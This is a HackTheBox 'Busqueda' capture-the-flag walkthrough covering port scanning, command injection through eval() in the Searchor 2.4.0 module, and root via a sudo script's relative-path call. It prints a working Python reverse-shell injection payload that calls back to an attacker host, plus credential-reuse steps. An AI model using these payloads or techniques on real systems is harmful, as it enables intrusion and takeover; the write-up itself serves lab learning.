HTB - Busqueda

In this walkthrough, we will be going through the Busqueda room from HackTheBox. It is rated Easy on the platform and consists of enumeration, exploitation and privilege escalation of a Linux boot2root machine. So, let's get started without any delay.


Machine Info:

Description: Busqueda is an Easy difficulty Linux machine that involves exploiting a command injection vulnerability in a Python module. To get root, we logged into the local Gitea service with credentials found in a config file and then abused a Python script that runs as root.


  • I started off with a regular nmap scan with service detection and found two open ports: 22 (SSH) and 80 (HTTP).

$ sudo nmap -sS -sV

Nmap scan report for
Host is up (0.22s latency).
Not shown: 997 closed ports
22/tcp open     ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.52
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 28.75 seconds

nmap scan

  • I tried to access the web server on port 80 and it redirected to the hostname searcher.htb, so I added it to my /etc/hosts file and accessed the application.

adding hostname

  • The Searcher application is a web app that lets you run custom queries against different search engines and online networks. I tried searching for some pussies using Google with auto-redirect unchecked, and it seems the application builds a search URL for the chosen engine from our search term.


Looking for pussies

searching for pussies

  • Fired up gobuster to see if I could find some interesting directories, but had no luck with it.

$ gobuster dir -u http://searcher.htb/ -w ~/Desktop/Wordlist/common.txt 
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:                     http://searcher.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2023/12/01 13:24:51 Starting gobuster in directory enumeration mode
/search               (Status: 405) [Size: 153]
/server-status        (Status: 403) [Size: 277]
2023/12/01 13:26:39 Finished

gobuster scan

  • Next, I intercepted the search request using Burp Suite and, in the response, found an interesting Server header showing that the application runs on Python 3.10.6 with Werkzeug (Flask) 2.1.2. I searched for known exploits for that Flask version but found nothing.

Burpsuite POST intercept

Burpsuite Response

  • Next, the footer caught my attention, as it mentions the name of a Python module, Searchor, along with its version, 2.4.0.

Searcher 2.4.0 running

  • I searched for known exploits for that module and found a PoC. According to the PoC, the vulnerability lies in the module's use of eval() on the search input, which lets us run arbitrary commands on the server and thus leads to command injection. Bingo!

Searcher 2.4.0 exploit

Arbitrary CMD Injection
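To make the bug class concrete from the defender's side, here is an added illustration (not Searchor's source and not the PoC from the walkthrough): a simplified model of a search-URL builder that splices user input into eval(), next to a hardened version and a small detection helper. The Engine class, engine names and URL templates are constructed for the example.

```python
# Added illustration, not Searchor's code: a simplified model of the pattern the
# walkthrough describes (a search URL built by eval() over a user-supplied string)
# next to a hardened version. Engine names and URL templates are constructed here.
from urllib.parse import quote_plus

ENGINES = {
    "google": "https://www.google.com/search?q={}",
    "bing": "https://www.bing.com/search?q={}",
}

class Engine:
    """Stand-in for a search-engine class whose name is spliced into eval()."""
    @staticmethod
    def google(query):
        return ENGINES["google"].format(query)

    @staticmethod
    def bing(query):
        return ENGINES["bing"].format(query)

def build_url_unsafe(engine, query):
    # Vulnerable pattern: user input is interpolated into Python source text and
    # then evaluated, so a quote in `query` terminates the string literal and
    # whatever follows is executed as code. Query is never encoded either.
    return eval(f"Engine.{engine}('{query}')")

def build_url_safe(engine, query):
    # Hardened: the engine name is an allowlist lookup and the query is only
    # ever data, percent-encoded for the URL. No source code is generated.
    template = ENGINES.get(engine)
    if template is None:
        raise ValueError(f"unknown engine: {engine!r}")
    return template.format(quote_plus(query))

def is_unsafe_for_eval(query):
    # Detection aid while the eval() path is still deployed: flag inputs that
    # would break out of the quoted literal in build_url_unsafe().
    return any(ch in query for ch in "'\"\\\n")
```

For benign input both builders agree on the URL; the difference only shows once the query carries quote characters, which the safe version encodes and the detection helper flags.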

Initial Access:

  • Next, I used the Python reverse shell payload below to get initial access on the web server and captured the user flag.

', exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);['/bin/sh','-i']);"))#

reverse shell payload

getting the shell


Privilege Escalation:

  • To find potential privilege escalation vectors, I uploaded linpeas to the target and executed it.

uploading linpeas

  • The linpeas output shows some interesting directories containing git config files. Looking into the config file for the running Flask application reveals a new domain, gitea.searcher.htb, and the user's password.

Linpeas output

git creds

  • Added the new domain to our /etc/hosts file and logged into Gitea using the found credentials. The repository had one commit by the administrator, with a SHA1 hash alongside it.

adding hostname

gitea login

hash identifier

  • Moving on, I checked the sudo permissions for the user svc using the found password. The result shows that we can run the script as root.

sudo -l

sudo -l

  • I checked how the script works by passing it whoami as an argument; it threw an error showing the usage. The script accepts three commands as arguments: docker ps, docker inspect and full-checkup.

executing the script

  • I tried to run the script with full-checkup as the argument from my home directory and it failed. That means it uses a relative path for the full-checkup script instead of an absolute one.

checking the script

full checkup

  • I created a script with the same name as full-checkup in the /tmp directory that prints the contents of root.txt, and executed it through the sudo script, thus getting the root flag.

getting root

Machine completed


So that was "Busqueda" for you. We started off with our regular nmap scan and found two open ports: 22 (SSH) and 80 (HTTP). Next, we enumerated the web server on port 80 and found the Searcher application running, which used the Searchor 2.4.0 Python module. We looked for known exploits related to it, found one and used it to get initial access on the target. For privilege escalation, we found git credentials in a git config file, logged into the Gitea subdomain with them and found the password for user svc. At last, we abused the sudo script to get root. On that note, I will take your leave and will meet you in the next one. Till then, "Happy hacking".
